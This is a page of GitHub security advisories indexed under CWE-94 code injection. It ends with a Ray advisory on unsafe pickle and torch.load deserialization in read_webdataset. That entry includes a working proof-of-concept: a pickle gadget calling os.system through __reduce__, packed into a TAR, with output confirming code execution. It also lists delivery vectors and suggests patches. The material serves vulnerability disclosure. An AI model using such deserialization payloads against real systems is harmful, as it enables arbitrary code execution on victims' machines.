CWE-94
Allowed-with-ReviewImproper Control of Generation of Code ('Code Injection')
Abstraction: Base · Status: Draft
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
8420 vulnerabilities reference this CWE, most recent first.
GHSA-HGV6-5HXF-XV66
Vulnerability from github – Published: 2024-01-11 00:30 – Updated: 2024-01-18 15:30This issue was addressed by forcing hardened runtime on the affected binaries at the system level. This issue is fixed in macOS Monterey 12.6.6, macOS Big Sur 11.7.7, macOS Ventura 13.4. An app may be able to inject code into sensitive binaries bundled with Xcode.
{
"affected": [],
"aliases": [
"CVE-2023-32383"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-01-10T22:15:47Z",
"severity": "HIGH"
},
"details": "This issue was addressed by forcing hardened runtime on the affected binaries at the system level. This issue is fixed in macOS Monterey 12.6.6, macOS Big Sur 11.7.7, macOS Ventura 13.4. An app may be able to inject code into sensitive binaries bundled with Xcode.",
"id": "GHSA-hgv6-5hxf-xv66",
"modified": "2024-01-18T15:30:35Z",
"published": "2024-01-11T00:30:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32383"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/HT213758"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/HT213759"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/HT213760"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-HH2X-4QPH-X5HF
Vulnerability from github – Published: 2022-05-02 03:48 – Updated: 2022-05-02 03:48The Oracle Siebel Option Pack for IE ActiveX control does not properly initialize memory that is used by the NewBusObj method, which allows remote attackers to execute arbitrary code via a crafted HTML document.
{
"affected": [],
"aliases": [
"CVE-2009-3737"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2010-08-17T20:00:00Z",
"severity": "HIGH"
},
"details": "The Oracle Siebel Option Pack for IE ActiveX control does not properly initialize memory that is used by the NewBusObj method, which allows remote attackers to execute arbitrary code via a crafted HTML document.",
"id": "GHSA-hh2x-4qph-x5hf",
"modified": "2022-05-02T03:48:07Z",
"published": "2022-05-02T03:48:07Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3737"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/40804"
},
{
"type": "WEB",
"url": "http://www.kb.cert.org/vuls/id/174089"
},
{
"type": "WEB",
"url": "http://www.osvdb.org/66926"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2010/2028"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-HH2X-7MF9-78FR
Vulnerability from github – Published: 2022-05-17 03:20 – Updated: 2023-01-27 00:53lib/sup/message_chunks.rb in Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the content_type of an email attachment.
{
"affected": [
{
"package": {
"ecosystem": "RubyGems",
"name": "sup"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.13.2.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "sup"
},
"ranges": [
{
"events": [
{
"introduced": "0.14.0"
},
{
"fixed": "0.14.1.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2013-4479"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2023-01-27T00:53:07Z",
"nvd_published_at": "2013-12-07T20:55:00Z",
"severity": "MODERATE"
},
"details": "`lib/sup/message_chunks.rb` in Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the content_type of an email attachment.",
"id": "GHSA-hh2x-7mf9-78fr",
"modified": "2023-01-27T00:53:07Z",
"published": "2022-05-17T03:20:59Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2013-4479"
},
{
"type": "WEB",
"url": "https://github.com/sup-heliotrope/sup/commit/ca0302e0c716682d2de22e9136400c704cc93e42"
},
{
"type": "WEB",
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/sup/CVE-2013-4479.yml"
},
{
"type": "PACKAGE",
"url": "https://github.com/sup-heliotrope/sup"
},
{
"type": "WEB",
"url": "https://web.archive.org/web/20140524005344/http://rubyforge.org/pipermail/sup-talk/2013-October/004996.html"
},
{
"type": "WEB",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-September/165917.html"
},
{
"type": "WEB",
"url": "http://rubyforge.org/pipermail/sup-talk/2013-October/004996.html"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2013/Oct/272"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/55294"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/55400"
},
{
"type": "WEB",
"url": "http://www.debian.org/security/2012/dsa-2805"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2013/10/30/2"
},
{
"type": "WEB",
"url": "http://www.phenoelit.org/stuff/whatsup.txt"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Sup Code Injection vulnerability"
}
GHSA-HH4J-QWC4-7XF5
Vulnerability from github – Published: 2022-05-02 00:10 – Updated: 2022-05-02 00:10Multiple PHP remote file inclusion vulnerabilities in DataFeedFile (DFF) PHP Framework API allow remote attackers to execute arbitrary PHP code via a URL in the DFF_config[dir_include] parameter to (1) DFF_affiliate_client_API.php, (2) DFF_featured_prdt.func.php, (3) DFF_mer.func.php, (4) DFF_mer_prdt.func.php, (5) DFF_paging.func.php, (6) DFF_rss.func.php, and (7) DFF_sku.func.php in include/.
{
"affected": [],
"aliases": [
"CVE-2008-4502"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2008-10-09T00:00:00Z",
"severity": "HIGH"
},
"details": "Multiple PHP remote file inclusion vulnerabilities in DataFeedFile (DFF) PHP Framework API allow remote attackers to execute arbitrary PHP code via a URL in the DFF_config[dir_include] parameter to (1) DFF_affiliate_client_API.php, (2) DFF_featured_prdt.func.php, (3) DFF_mer.func.php, (4) DFF_mer_prdt.func.php, (5) DFF_paging.func.php, (6) DFF_rss.func.php, and (7) DFF_sku.func.php in include/.",
"id": "GHSA-hh4j-qwc4-7xf5",
"modified": "2022-05-02T00:10:40Z",
"published": "2022-05-02T00:10:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2008-4502"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/45764"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/6700"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/32166"
},
{
"type": "WEB",
"url": "http://securityreason.com/securityalert/4370"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/31644"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-HHC2-FFW9-RJR6
Vulnerability from github – Published: 2022-05-17 01:04 – Updated: 2025-04-11 03:38The normalizeDocument function in Mozilla Firefox before 3.5.12 and 3.6.x before 3.6.9, Thunderbird before 3.0.7 and 3.1.x before 3.1.3, and SeaMonkey before 2.0.7 does not properly handle the removal of DOM nodes during normalization, which might allow remote attackers to execute arbitrary code via vectors involving access to a deleted object.
{
"affected": [],
"aliases": [
"CVE-2010-2766"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2010-09-09T19:00:00Z",
"severity": "HIGH"
},
"details": "The normalizeDocument function in Mozilla Firefox before 3.5.12 and 3.6.x before 3.6.9, Thunderbird before 3.0.7 and 3.1.x before 3.1.3, and SeaMonkey before 2.0.7 does not properly handle the removal of DOM nodes during normalization, which might allow remote attackers to execute arbitrary code via vectors involving access to a deleted object.",
"id": "GHSA-hhc2-ffw9-rjr6",
"modified": "2025-04-11T03:38:50Z",
"published": "2022-05-17T01:04:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2766"
},
{
"type": "WEB",
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=580445"
},
{
"type": "WEB",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11778"
},
{
"type": "WEB",
"url": "http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox"
},
{
"type": "WEB",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-September/047282.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2010-10/msg00002.html"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/42867"
},
{
"type": "WEB",
"url": "http://support.avaya.com/css/P8/documents/100112690"
},
{
"type": "WEB",
"url": "http://www.debian.org/security/2010/dsa-2106"
},
{
"type": "WEB",
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2010:173"
},
{
"type": "WEB",
"url": "http://www.mozilla.org/security/announce/2010/mfsa2010-57.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/43100"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2010/2323"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2011/0061"
},
{
"type": "WEB",
"url": "http://www.zerodayinitiative.com/advisories/ZDI-10-176"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-HHGM-J3W3-6P82
Vulnerability from github – Published: 2022-05-01 23:54 – Updated: 2022-05-01 23:54PHP remote file inclusion vulnerability in src/browser/resource/categories/resource_categories_view.php in Open Digital Assets Repository System (ODARS) 1.0.2, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the CLASSES_ROOT parameter.
{
"affected": [],
"aliases": [
"CVE-2008-2885"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2008-06-27T18:41:00Z",
"severity": "HIGH"
},
"details": "PHP remote file inclusion vulnerability in src/browser/resource/categories/resource_categories_view.php in Open Digital Assets Repository System (ODARS) 1.0.2, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the CLASSES_ROOT parameter.",
"id": "GHSA-hhgm-j3w3-6p82",
"modified": "2022-05-01T23:54:30Z",
"published": "2022-05-01T23:54:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2008-2885"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/43285"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/5906"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/30784"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/29881"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-HHM9-WQQX-P8HF
Vulnerability from github – Published: 2025-05-08 06:30 – Updated: 2025-05-08 06:30The Wolmart | Multi-Vendor Marketplace WooCommerce Theme theme for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.8.11. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
{
"affected": [],
"aliases": [
"CVE-2024-13793"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-08T05:15:50Z",
"severity": "HIGH"
},
"details": "The Wolmart | Multi-Vendor Marketplace WooCommerce Theme theme for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.8.11. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.",
"id": "GHSA-hhm9-wqqx-p8hf",
"modified": "2025-05-08T06:30:33Z",
"published": "2025-05-08T06:30:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13793"
},
{
"type": "WEB",
"url": "https://themeforest.net/item/wolmart-multivendor-marketplace-woocommerce-theme/32947681#item-description__changelog"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6eb57c97-f560-42d1-87bd-b19c60700956?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-HHR2-6RP6-2V7M
Vulnerability from github – Published: 2026-04-22 21:31 – Updated: 2026-04-22 21:31The Avada (Fusion) Builder plugin for WordPress is vulnerable to Arbitrary WordPress Action Execution in all versions up to, and including, 3.15.1. This is due to the plugin's output_action_hook() function accepting user-controlled input to trigger any registered WordPress action hook without proper authorization checks. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary WordPress action hooks via the Dynamic Data feature, potentially leading to privilege escalation, file inclusion, denial of service, or other security impacts depending on which action hooks are available in the WordPress installation.
{
"affected": [],
"aliases": [
"CVE-2026-1509"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-15T04:17:33Z",
"severity": "MODERATE"
},
"details": "The Avada (Fusion) Builder plugin for WordPress is vulnerable to Arbitrary WordPress Action Execution in all versions up to, and including, 3.15.1. This is due to the plugin\u0027s `output_action_hook()` function accepting user-controlled input to trigger any registered WordPress action hook without proper authorization checks. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary WordPress action hooks via the Dynamic Data feature, potentially leading to privilege escalation, file inclusion, denial of service, or other security impacts depending on which action hooks are available in the WordPress installation.",
"id": "GHSA-hhr2-6rp6-2v7m",
"modified": "2026-04-22T21:31:44Z",
"published": "2026-04-22T21:31:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1509"
},
{
"type": "WEB",
"url": "https://avada.com/documentation/avada-changelog"
},
{
"type": "WEB",
"url": "https://themeforest.net/item/avada-responsive-multipurpose-theme/2833226"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fdc57b06-bae9-49a3-84dd-f593705330e9?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-HHRP-GW25-JR43
Vulnerability from github – Published: 2026-07-24 15:47 – Updated: 2026-07-24 15:47Summary
ray.data.read_webdataset(paths=...) is a @PublicAPI(stability="alpha")
reader for WebDataset-format TAR files. Its default decoder=True invokes
_default_decoder on every sample's keys, which routes file extension to a
decoder by extension. Two of those branches deserialize attacker-controlled
bytes with no validation:
.pickle/.pkl->pickle.loads(value).pt/.pth->torch.load(io.BytesIO(value), weights_only=False)
Both fire during a standard ray.data.read_webdataset(...).take_all() /
.iter_batches() call. No flags, no opt-in, no environment variable.
An attacker who can supply a TAR (via S3 share, HuggingFace Hub mirror,
email attachment, model-zoo, or any HTTP URL the user passes to
read_webdataset) achieves arbitrary code execution in the calling
Ray process at schema-sample time, before row data is consumed.
This is the same class of bug as GHSA-mw35-8rx3-xf9r (Parquet Arrow
Extension Type cloudpickle deserialization, patched in 2.55.0): standard
data-loading API, attacker-controlled file format, deserialization gadget
invoked transparently. The 2.55.0 patch addressed
tensor_extensions/arrow.py:_deserialize_with_fallback and made cloudpickle
opt-in via RAY_DATA_AUTOLOAD_CLOUDPICKLE_TENSOR_METADATA=1. The
WebDataset path is a different code site and was not touched.
Vulnerable code (HEAD a157d4d)
python/ray/data/_internal/datasource/webdataset_datasource.py lines
175-225, the _default_decoder function:
def _default_decoder(sample, format=True):
sample = dict(sample)
for key, value in sample.items():
extension = key.split(".")[-1]
...
elif extension in ["pt", "pth"]:
import torch
# PyTorch 2.6 changed torch.load default weights_only=True, which
# breaks loading general Python objects previously serialized for
# WebDataset .pt payloads.
sample[key] = torch.load(io.BytesIO(value), weights_only=False) # line 219
elif extension in ["pickle", "pkl"]:
import pickle
sample[key] = pickle.loads(value) # line 223
return sample
The comment for the .pt/.pth branch is itself a security smell: it
documents that the maintainer chose weights_only=False to override
PyTorch 2.6's safer default. The comment treats this as a compatibility
fix; it functionally re-enables an arbitrary-code-execution path that
upstream PyTorch closed.
Reachability and default-on confirmation
python/ray/data/read_api.py:2289 defines read_webdataset with default
decoder=True:
@PublicAPI(stability="alpha")
def read_webdataset(
paths,
*,
...
decoder: Optional[Union[bool, str, callable, list]] = True,
...
) -> Dataset:
...
datasource = WebDatasetDatasource(paths, decoder=decoder, ...)
WebDatasetDatasource._read_stream (line 367) calls the decoder
unconditionally when not None:
for sample in samples:
if self.decoder is not None:
sample = _apply_list(self.decoder, sample, default=_default_decoder)
True is not None evaluates True, so the default decoder fires for every
invocation that doesn't explicitly pass decoder=None (or a custom safe
decoder). The documentation does not warn about the behavior.
End-to-end reproduction
Tested on a fresh venv (pip install ray[data]) on Linux x86_64. Ray
reports __version__ == "2.55.1" (the patched-against-GHSA-mw35 release):
import io, os, pickle, subprocess, tarfile, tempfile, sys
MARKER = "/tmp/ray_webdataset_poc_rce_marker"
class Gadget:
def __reduce__(self):
cmd = (f"/bin/sh -c \"printf 'RCE via ray.data.read_webdataset\\n"
f"pid=%s\\nuser=%s\\n' \"$$\" \"$(whoami)\" > {MARKER}\"")
return (os.system, (cmd,))
with tempfile.NamedTemporaryFile(suffix=".tar", delete=False) as f:
tar_path = f.name
with tarfile.open(tar_path, "w") as tar:
for name, body in (("000000.txt", b"hello"),
("000000.pkl", pickle.dumps(Gadget()))):
ti = tarfile.TarInfo(name=name); ti.size = len(body)
tar.addfile(ti, io.BytesIO(body))
import ray, ray.data
ray.init(num_cpus=2, ignore_reinit_error=True, log_to_driver=False)
ds = ray.data.read_webdataset(paths=[tar_path])
rows = ds.take_all()
assert os.path.exists(MARKER), "no RCE"
print(open(MARKER).read())
Output:
ray version: 2.55.1
crafted /tmp/tmpjpos115h.tar (10240 bytes)
ds.take_all() returned 1 row(s)
RCE CONFIRMED:marker at /tmp/ray_webdataset_poc_rce_marker:
RCE via ray.data.read_webdataset
pid=248816
user=xyz
The .pt/.pth variant is the exact same primitive against the
torch.load(io.BytesIO(value), weights_only=False) branch; replace the
TAR member with 000000.pt containing torch.save(Gadget()) to reproduce.
Real-world delivery vectors
paths=["s3://bucket/poisoned.tar"]-- the user thinks they are reading a WebDataset shard; the bucket is shared, mis-permissioned, or compromised.paths=["https://attacker/model.tar"]-- HTTP-served WebDataset.- HuggingFace Hub -- WebDataset is a recognized HF dataset format; users
pull TAR shards via
datasetsand feed them to Ray Data. - Model-zoo / leaderboard tarballs -- common in CV/ASR workflows.
Why GHSA-mw35 doesn't cover this
GHSA-mw35-8rx3-xf9r patched tensor_extensions/arrow.py:_deserialize_with_fallback
by gating cloudpickle.loads behind
RAY_DATA_AUTOLOAD_CLOUDPICKLE_TENSOR_METADATA=1. That change touches
the Parquet ExtensionType deserialization path only. The advisory text
does not mention WebDataset, the WebDataset code is in a different
module, and the unsafe loads here use pickle.loads and
torch.load(weights_only=False) (not cloudpickle.loads).
Suggested patch
Two minimal options, both Ray-internal:
- Make the unsafe extensions opt-in, mirroring the GHSA-mw35 fix
pattern. Replace the
.pt/.pthand.pkl/.picklebranches with a guard:
```python import os _ALLOW_UNSAFE = os.environ.get( "RAY_DATA_WEBDATASET_ALLOW_UNSAFE_PICKLE", "0" ) == "1"
elif extension in ["pt", "pth"]: if not _ALLOW_UNSAFE: raise ValueError( f"Refusing to load .pt/.pth member {key!r} from WebDataset " f"with weights_only=False. Set " f"RAY_DATA_WEBDATASET_ALLOW_UNSAFE_PICKLE=1 only for trusted " f"sources." ) sample[key] = torch.load(io.BytesIO(value), weights_only=False)
elif extension in ["pickle", "pkl"]: if not _ALLOW_UNSAFE: raise ValueError( f"Refusing to unpickle WebDataset member {key!r} -- " f"untrusted pickle is RCE. Provide your own decoder " f"or set RAY_DATA_WEBDATASET_ALLOW_UNSAFE_PICKLE=1 for " f"trusted sources." ) sample[key] = pickle.loads(value) ```
- Drop these branches from the default decoder entirely and require callers to provide their own decoder when working with .pkl/.pt samples. This is the safer default, matches WebDataset upstream's guidance ("by default, use safe decoders"), and is consistent with the spirit of the GHSA-mw35 patch.
Either option flips the default-on RCE primitive into an explicit
opt-in. The current default-on behavior provides no signal to users
that calling ray.data.read_webdataset on an untrusted TAR is
equivalent to running attacker code.
References
- Source:
python/ray/data/_internal/datasource/webdataset_datasource.py:175-225 - Public API:
python/ray/data/read_api.py:2287-2370(read_webdataset) - Sibling advisory of the same class: GHSA-mw35-8rx3-xf9r (Parquet Arrow Extension Type, patched 2.55.0)
- Earlier related advisory: PR #45084 (2024) fixed PyExtensionType cloudpickle but did not touch the WebDataset decoder.
- WebDataset format: https://github.com/webdataset/webdataset
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "ray"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.56.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-57516"
],
"database_specific": {
"cwe_ids": [
"CWE-502",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-24T15:47:38Z",
"nvd_published_at": "2026-07-01T17:16:37Z",
"severity": "HIGH"
},
"details": "## Summary\n\n`ray.data.read_webdataset(paths=...)` is a `@PublicAPI(stability=\"alpha\")`\nreader for WebDataset-format TAR files. Its default `decoder=True` invokes\n`_default_decoder` on every sample\u0027s keys, which routes file extension to a\ndecoder by extension. Two of those branches deserialize attacker-controlled\nbytes with no validation:\n\n- `.pickle` / `.pkl` -\u003e `pickle.loads(value)`\n- `.pt` / `.pth` -\u003e `torch.load(io.BytesIO(value), weights_only=False)`\n\nBoth fire during a standard `ray.data.read_webdataset(...).take_all()` /\n`.iter_batches()` call. No flags, no opt-in, no environment variable.\nAn attacker who can supply a TAR (via S3 share, HuggingFace Hub mirror,\nemail attachment, model-zoo, or any HTTP URL the user passes to\n`read_webdataset`) achieves arbitrary code execution in the calling\nRay process at schema-sample time, before row data is consumed.\n\nThis is the same class of bug as GHSA-mw35-8rx3-xf9r (Parquet Arrow\nExtension Type cloudpickle deserialization, patched in 2.55.0): standard\ndata-loading API, attacker-controlled file format, deserialization gadget\ninvoked transparently. The 2.55.0 patch addressed\n`tensor_extensions/arrow.py:_deserialize_with_fallback` and made cloudpickle\nopt-in via `RAY_DATA_AUTOLOAD_CLOUDPICKLE_TENSOR_METADATA=1`. The\nWebDataset path is a different code site and was not touched.\n\n## Vulnerable code (HEAD `a157d4d`)\n\n`python/ray/data/_internal/datasource/webdataset_datasource.py` lines\n175-225, the `_default_decoder` function:\n\n```python\ndef _default_decoder(sample, format=True):\n sample = dict(sample)\n for key, value in sample.items():\n extension = key.split(\".\")[-1]\n ...\n elif extension in [\"pt\", \"pth\"]:\n import torch\n # PyTorch 2.6 changed torch.load default weights_only=True, which\n # breaks loading general Python objects previously serialized for\n # WebDataset .pt payloads.\n sample[key] = torch.load(io.BytesIO(value), weights_only=False) # line 219\n elif extension in [\"pickle\", \"pkl\"]:\n import pickle\n sample[key] = pickle.loads(value) # line 223\n return sample\n```\n\nThe comment for the `.pt/.pth` branch is itself a security smell: it\ndocuments that the maintainer chose `weights_only=False` *to override*\nPyTorch 2.6\u0027s safer default. The comment treats this as a compatibility\nfix; it functionally re-enables an arbitrary-code-execution path that\nupstream PyTorch closed.\n\n## Reachability and default-on confirmation\n\n`python/ray/data/read_api.py:2289` defines `read_webdataset` with default\n`decoder=True`:\n\n```python\n@PublicAPI(stability=\"alpha\")\ndef read_webdataset(\n paths,\n *,\n ...\n decoder: Optional[Union[bool, str, callable, list]] = True,\n ...\n) -\u003e Dataset:\n ...\n datasource = WebDatasetDatasource(paths, decoder=decoder, ...)\n```\n\n`WebDatasetDatasource._read_stream` (line 367) calls the decoder\nunconditionally when not None:\n\n```python\nfor sample in samples:\n if self.decoder is not None:\n sample = _apply_list(self.decoder, sample, default=_default_decoder)\n```\n\n`True is not None` evaluates True, so the default decoder fires for every\ninvocation that doesn\u0027t explicitly pass `decoder=None` (or a custom safe\ndecoder). The documentation does not warn about the behavior.\n\n## End-to-end reproduction\n\nTested on a fresh venv (`pip install ray[data]`) on Linux x86_64. Ray\nreports `__version__ == \"2.55.1\"` (the patched-against-GHSA-mw35 release):\n\n```python\nimport io, os, pickle, subprocess, tarfile, tempfile, sys\n\nMARKER = \"/tmp/ray_webdataset_poc_rce_marker\"\n\nclass Gadget:\n def __reduce__(self):\n cmd = (f\"/bin/sh -c \\\"printf \u0027RCE via ray.data.read_webdataset\\\\n\"\n f\"pid=%s\\\\nuser=%s\\\\n\u0027 \\\"$$\\\" \\\"$(whoami)\\\" \u003e {MARKER}\\\"\")\n return (os.system, (cmd,))\n\nwith tempfile.NamedTemporaryFile(suffix=\".tar\", delete=False) as f:\n tar_path = f.name\nwith tarfile.open(tar_path, \"w\") as tar:\n for name, body in ((\"000000.txt\", b\"hello\"),\n (\"000000.pkl\", pickle.dumps(Gadget()))):\n ti = tarfile.TarInfo(name=name); ti.size = len(body)\n tar.addfile(ti, io.BytesIO(body))\n\nimport ray, ray.data\nray.init(num_cpus=2, ignore_reinit_error=True, log_to_driver=False)\nds = ray.data.read_webdataset(paths=[tar_path])\nrows = ds.take_all()\nassert os.path.exists(MARKER), \"no RCE\"\nprint(open(MARKER).read())\n```\n\nOutput:\n\n```\nray version: 2.55.1\ncrafted /tmp/tmpjpos115h.tar (10240 bytes)\nds.take_all() returned 1 row(s)\nRCE CONFIRMED:marker at /tmp/ray_webdataset_poc_rce_marker:\n RCE via ray.data.read_webdataset\n pid=248816\n user=xyz\n```\n\nThe `.pt/.pth` variant is the exact same primitive against the\n`torch.load(io.BytesIO(value), weights_only=False)` branch; replace the\nTAR member with `000000.pt` containing `torch.save(Gadget())` to reproduce.\n\n## Real-world delivery vectors\n\n- `paths=[\"s3://bucket/poisoned.tar\"]` -- the user thinks they are reading\n a WebDataset shard; the bucket is shared, mis-permissioned, or\n compromised.\n- `paths=[\"https://attacker/model.tar\"]` -- HTTP-served WebDataset.\n- HuggingFace Hub -- WebDataset is a recognized HF dataset format; users\n pull TAR shards via `datasets` and feed them to Ray Data.\n- Model-zoo / leaderboard tarballs -- common in CV/ASR workflows.\n\n## Why GHSA-mw35 doesn\u0027t cover this\n\nGHSA-mw35-8rx3-xf9r patched `tensor_extensions/arrow.py:_deserialize_with_fallback`\nby gating `cloudpickle.loads` behind\n`RAY_DATA_AUTOLOAD_CLOUDPICKLE_TENSOR_METADATA=1`. That change touches\nthe Parquet ExtensionType deserialization path only. The advisory text\ndoes not mention WebDataset, the WebDataset code is in a different\nmodule, and the unsafe loads here use `pickle.loads` and\n`torch.load(weights_only=False)` (not `cloudpickle.loads`).\n\n## Suggested patch\n\nTwo minimal options, both Ray-internal:\n\n1. **Make the unsafe extensions opt-in**, mirroring the GHSA-mw35 fix\n pattern. Replace the `.pt/.pth` and `.pkl/.pickle` branches with a\n guard:\n\n ```python\n import os\n _ALLOW_UNSAFE = os.environ.get(\n \"RAY_DATA_WEBDATASET_ALLOW_UNSAFE_PICKLE\", \"0\"\n ) == \"1\"\n\n elif extension in [\"pt\", \"pth\"]:\n if not _ALLOW_UNSAFE:\n raise ValueError(\n f\"Refusing to load .pt/.pth member {key!r} from WebDataset \"\n f\"with weights_only=False. Set \"\n f\"RAY_DATA_WEBDATASET_ALLOW_UNSAFE_PICKLE=1 only for trusted \"\n f\"sources.\"\n )\n sample[key] = torch.load(io.BytesIO(value), weights_only=False)\n\n elif extension in [\"pickle\", \"pkl\"]:\n if not _ALLOW_UNSAFE:\n raise ValueError(\n f\"Refusing to unpickle WebDataset member {key!r} -- \"\n f\"untrusted pickle is RCE. Provide your own decoder \"\n f\"or set RAY_DATA_WEBDATASET_ALLOW_UNSAFE_PICKLE=1 for \"\n f\"trusted sources.\"\n )\n sample[key] = pickle.loads(value)\n ```\n\n2. **Drop these branches from the default decoder entirely** and require\n callers to provide their own decoder when working with .pkl/.pt\n samples. This is the safer default, matches WebDataset upstream\u0027s\n guidance (\"by default, use safe decoders\"), and is consistent with\n the spirit of the GHSA-mw35 patch.\n\nEither option flips the default-on RCE primitive into an explicit\nopt-in. The current default-on behavior provides no signal to users\nthat calling `ray.data.read_webdataset` on an untrusted TAR is\nequivalent to running attacker code.\n\n## References\n\n- Source: `python/ray/data/_internal/datasource/webdataset_datasource.py:175-225`\n- Public API: `python/ray/data/read_api.py:2287-2370` (`read_webdataset`)\n- Sibling advisory of the same class: GHSA-mw35-8rx3-xf9r (Parquet\n Arrow Extension Type, patched 2.55.0)\n- Earlier related advisory: PR #45084 (2024) fixed PyExtensionType\n cloudpickle but did not touch the WebDataset decoder.\n- WebDataset format: https://github.com/webdataset/webdataset",
"id": "GHSA-hhrp-gw25-jr43",
"modified": "2026-07-24T15:47:38Z",
"published": "2026-07-24T15:47:38Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ray-project/ray/security/advisories/GHSA-hhrp-gw25-jr43"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57516"
},
{
"type": "WEB",
"url": "https://github.com/ray-project/ray/pull/63469"
},
